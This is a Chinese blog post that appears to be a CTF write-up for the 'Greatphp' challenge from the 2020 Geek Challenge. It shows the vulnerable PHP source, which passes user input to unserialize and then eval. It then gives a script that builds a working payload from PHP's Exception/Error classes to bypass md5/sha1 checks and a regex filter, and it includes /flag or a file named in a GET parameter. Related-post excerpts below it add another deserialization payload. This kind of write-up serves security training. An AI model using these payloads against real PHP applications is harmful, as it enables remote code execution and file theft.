[极客大挑战 2020]Greatphp (php 内置类)

最新推荐文章于 2024-09-02 10:55:23 发布
最新推荐文章于 2024-09-02 10:55:23 发布
阅读量1.4k 收藏 3
点赞数 1
分类专栏: rce命令执行 文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62046696/article/details/128390122
版权 
<?php
error_reporting(0);
class SYCLOVER {
    public $syc;
    public $lover;

    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }
           
        }
    }
}

if (isset($_GET['great'])){
    unserialize($_GET['great']);
} else {
    highlight_file(__FILE__);
}

?>

发现第一个if是md5和sha1函数的漏洞,用一个数组就可以绕过去,但是命令里面eval()syc这个参数又得被执行,所以不能是数组。

这时候只能想到php中的内置类,也就是原生类。

Error:用于PHP7、8,开启报错。

Exceotion:用于PHP5、7、8,开启报错。会自动调用__tostring

Error是所有PHP内部错误类的基类,该类是在PHP 7.0.0 中开始引入的

PHP7中,可以在echo时触发__toString,来构造XSS。

实验发现除了报错的行数不同其他都一样 ,所以我们把他们放在一行不久可以绕过第一个if

 这里本来是用Exception构造,可是报错,因为我的php版本是5.41的然后没有Error,正在我想为什么报错的时候突然想到了,因为php7版本才引入PHP7中,可以在echo时触发__toString所以换了一个版本。

<?php
 
class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }
 
        }
    }
}
 
$str = "?><?=include~".urldecode("%D0%99%93%9E%98")."?>";
/* 
或使用[~(取反)][!%FF]的形式,
即: $str = "?><?=include[~".urldecode("%D0%99%93%9E%98")."][!.urldecode("%FF")."]?>";    
 
$str = "?><?=include $_GET[_]?>"; 
*/
$a=new Exception($str,1);$b=new Exception($str,2);
$c = new SYCLOVER();
$c->syc = $a;
$c->lover = $b;
echo(urlencode(serialize($c)));
 
?>

实验发现成功 ,Exception可以换成Error是一样的

绕过第一个if是因为后面第二个参数的不同,举例子

相同以后进不去if.空的界面 

 

"?><?=include~".urldecode("%D0%99%93%9E%98")."?>";

这里解释以下,为什么要?>闭合掉,因为前面可能会有一些报错的信息,所以可以先闭合掉前面的东西,然后再来包含后面的是取反,因为在链里面所以需要用到解码,不用编码绕不过去正则,里面是/flag因为刷题多了都在根目录下面,不在的话正能一步步尝试。

[极客挑战 2020]Greatphp
snowlyzz的博客
09-15 688
php 原生类的学习与姿势利用,
php原生类的总结
unexpectedthing的博客
12-12 6155
文章目录前言利用Error/Exception 内置类进行 XSSError内置类Exception内置类[BJDCTF 2nd]xss之光使用 Error/Exception 内置类绕过哈希比较Error类Exception 类[2020 极客挑战]GreatphpSoapClient类来进行SSRF 前言 之所以这个总结,极客挑战的SoEzunser考到了php原生类来遍历目录 其实,在CTF题目中,可以利用php原生类来进行XSS,反序列化,SSRF,XXE和读文件的思路 通过遍历看一下php的内
[极客挑战 2020]Greatphp 原生类绕过
qq_54929891的博客
05-10 1154
<?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== s.
PHP 原生类学习与利用
snowlyzz的博客
09-22 1458
php 原生类利用与学习。
BUUCTF--[极客挑战 2020]Greatphp
qq_46263951的博客
08-11 1323
进入页面后可以看到给出的代码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
极客挑战php,buucitf-[极客挑战 2020]Roamphp1-Welcome
weixin_36280317的博客
03-22 275
打开靶机,发现什么也没有,因为极客挑战有hint.txt,里面说尝试换一种请求的方式,bp抓包,然后发送了POST请求,出现了下面的界面这个还是挺简单的,因为是极客挑战上的第一波题,关键是这个如果不是用POST请求,就会出现类似报错的信息。紧接着就是isset这个很好绕过,我们要传参,这个肯定到了else if判断,如果进入这个循环,我们就可以拿到这个站的phpinfo()信息,POST传两个...
[极客挑战 2020]Greatphp1
alwtj的博客
09-02 1678
所以,我们可以通过PHP的原生类来进行绕过(Error 或者 Exception),这两个类中呢存在一个_toString()的方法属性,意思就是当这两个类的对面需要被转换成字符串的时候就会调用 _toString()函数,下半部分就是传入一个great的参数,对这个参数进行反序列化,所以我们目标就明确了,我们需要绕过这个强类型比较,之后在绕过正则表达,最后执行寻找flag的命令.php 来实现我们包含flag文件的效果,又因为正则表达过滤了php我们可以用
php内置类
weixin_30389003的博客
07-04 348
PHP的一些内置类:- dir- PDO- Memcache- DOM -exception 转载于:https://www.cnblogs.com/best-jobs/archive/2012/07/04/2576412.html
PHP的一些内置类
lesliewong2006的专栏
07-23 1560
PHP的一些内置类:- dir- PDO- Memcache- DOM先做个记号。 
PHP内置标准类
weixin_34304013的博客
08-17 236
PHP内置标准类 php语言内部,有“很多现成的类”,其中有一个,被称为“内置标准类”。 这个类“内部”可以认为什么都没有,类似这样: class stdclass{ } 其作用,可以用于存储一些临时的简单的数据: $obj1->pp1 = 1; $obj1->port = ‘3306’; 也可以用于类型转换时用于存储数据,如下节所示 转载于:http...
php 内置标准类
anwu8133的博客
05-24 462
PHP中,有很多“现成的类”,其中有一个被称为“内置标准类”。这个类“内部”可以认为什么也没有。 class stdclass{ }1<?php$obj1 = new stdclass();var_dump($obj1); class A{}$obj2 = new A();var_dump($obj2);?>12345678  运行结果: object(stdClass...
php 内置,php 内置标准类
weixin_42593701的博客
03-10 284
PHP中,有很多“现成的类”,其中有一个被称为“内置标准类”。这个类“内部”可以认为什么也没有。class stdclass{ }1$obj1 = new stdclass();var_dump($obj1);class A{}$obj2 = new A();var_dump($obj2);?>12345678运行结果:object(stdClass)[1]object(A)[2]123可以...
极客挑战2020年部分wp
qq_46041723的博客
11-17 1769
2020极客挑战部分wp前言web一、朋友的学妹二、EZWWW三、刘壮的黑页四、welcome 前言 2020极客挑战开始了。又是一届自闭季。在变菜的路上一去不复返 web 一、朋友的学妹 打开题目 发现提示,然后查看控制窗口发现 然后看到base64加密,解密后得到flag。 二、EZWWW 打开题目 发现提示网站已经备份,那么就直接御剑扫后台得到 然后打开zip路径得到下载提示,打开 直接放弃文档里的flag。肯定假的。所以打开index.php,发现 <html> <hea
BUUCTF--[极客挑战 2020]Roamphp1-Welcome
qq_46263951的博客
07-29 412
进入页面后一片空白,查看源码也啥也没有,蒙蔽中... 看佬wp说有提示,直接改为post请求即可查看到一段代码 根据源码中的提示,如果我们想要获取更多的信息就要使下面的语句成立 if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){ 若想成立非常简单,因为sha1函数无法处理数组,所以令两个变量都为数组则得出的结果为false===false值为..
[BUUCTF0223][极客挑战 2020]Roamphp1-Welcome
m0_52674595的博客
12-24 525
[BUUCTF0223] [极客挑战 2020]Roamphp1-Welcome 打开靶机 什么都没 查看源码 什么也没有 猜想不是用GET请求 尝试用POST请求 使用火狐的插件:RESTClient 使用POST请求 查看预览 看到要求 $_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'] 即roam1与roam2不能相等 再看sha1()函数 查看得知sha1()
php内置类小结
leekos的博客,分享web安全相关知识~
05-31 1494
PHP内置类 SoapClient 是一个专门用来访问web服务的类,可以提供一个基于SOAP协议访问Web服务的 PHP 客户端。Error类是php的一个内置类,通常用于自定义一个Error,在php7版本后适用,可能存在xss漏洞,因为内置了一个。类也是可以遍历一个文件目录,使用方法与前两个类也基本相似。看了一下文档发现该原生类是继承FilesystemIterator的,所以也是以绝对路径显示的。(需要注意的是,我们使用GlobIterator只需要输入路径即可,不需要添加glob://)
极客挑战 2019]PHP
最新发布
02-27
### 关于2019极客挑战中的PHP题目解析 #### 题目描述与目标 在2019年的极客挑战中,存在一道涉及PHP反序列化的安全漏洞利用问题。该题目的核心在于理解如何通过构造特定的输入来触发程序内部逻辑错误从而获取敏感信息或执行恶意操作。 给定的PHP类`Name`定义如下[^1]: ```php <?php class Name{ private $username = 'admin'; private $password = 100; } $select = new Name(); $res = serialize(@$select); echo $res; ?> ``` 此段代码展示了对象被序列化后的字符串形式。为了完成挑战,参赛者需要了解另一个脚本文件的内容,其中包含了对来自HTTP请求参数`select`的数据进行了未经验证直接反序列化的处理过程[^2]: ```php <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> ``` 当上述两部分结合起来考虑时,可以发现如果能够控制传递给`$_GET['select']`变量的具体值,则可以通过精心设计的对象结构绕过权限校验机制并最终获得flag。具体来说就是满足条件`username==='admin'&&password==100`即可成功读取标志位数据[^3]。 #### 利用方法概述 要实现这一攻击向量,参与者需构建一个合法但具有特殊属性的对象表示法作为查询字符串的一部分发送至服务器端口。由于PHP允许自定义类名及其成员变量名称,在不违反语法的前提下几乎可以任意指定这些组件;因此只要能正确模拟原始类实例的状态就能顺利通过身份验证检查。 例如,下面是一个可能用于测试的有效载荷(payload),它模仿了原生`Name`类的样子: ```php O:4:"Name":2:{s:11:"\0Name\0username";s:5:"admin";s:11:"\0Name\0password";i:100;} ``` 这里的关键点在于使用`\0`字符分隔符以及适当调整字段长度以匹配预期格式。一旦这样的字符串被提交到含有漏洞的应用程序处,就有可能导致意外行为的发生——即让应用程序误认为接收到的是由其自身创建出来的正常对象而非外部注入物。 #### 安全建议 为了避免此类风险,开发者应当遵循最佳实践原则,比如始终对外部输入做严格过滤和消毒工作、避免不必要的序列化/反序列化进程间通信方式等措施加以防范潜在威胁。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值